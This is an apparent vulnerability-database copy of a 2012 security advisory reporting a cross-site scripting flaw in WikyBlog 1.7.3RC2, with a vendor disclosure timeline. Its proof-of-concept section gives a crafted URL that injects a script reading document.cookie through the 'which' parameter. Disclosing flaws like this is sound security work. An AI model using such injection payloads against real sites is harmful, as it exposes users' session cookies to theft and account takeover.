Lucene search
SecurityvulnsSECURITYVULNS:DOC:27785HistoryMar 19, 2012 - 12:00 a.m.
WikyBlog 1.7.3RC2 XSS vulnerability
2012-03-1900:00:00
vulners.com
23
Advisory: WikyBlog 1.7.3RC2 XSS vulnerability
Advisory ID: SSCHADV2012-006
Author: Stefan Schurtz
Affected Software: Successfully tested on WikyBlog 1.7.3RC2
Vendor URL: http://www.wikyblog.com/
Vendor Status: informed
==========================
Vulnerability Description
WikyBlog 1.7.3RC2 is prone to a XSS vulnerability
==================
PoC-Exploit
http://[target]/WikyBlog-1.7.3rc2/index.php/Special/Main/Templates?cmd=copy&which='"<script>alert(document.cookie)</script>
=========
Solution
====================
Disclosure Timeline
25-Feb-2012 - vendor informed
15-Mar-2012 - no response from vendor
========
Credits
Vulnerability found and advisory written by Stefan Schurtz.
===========
References
http://www.darksecurity.de/advisories/2012/SSCHADV2012-006.txt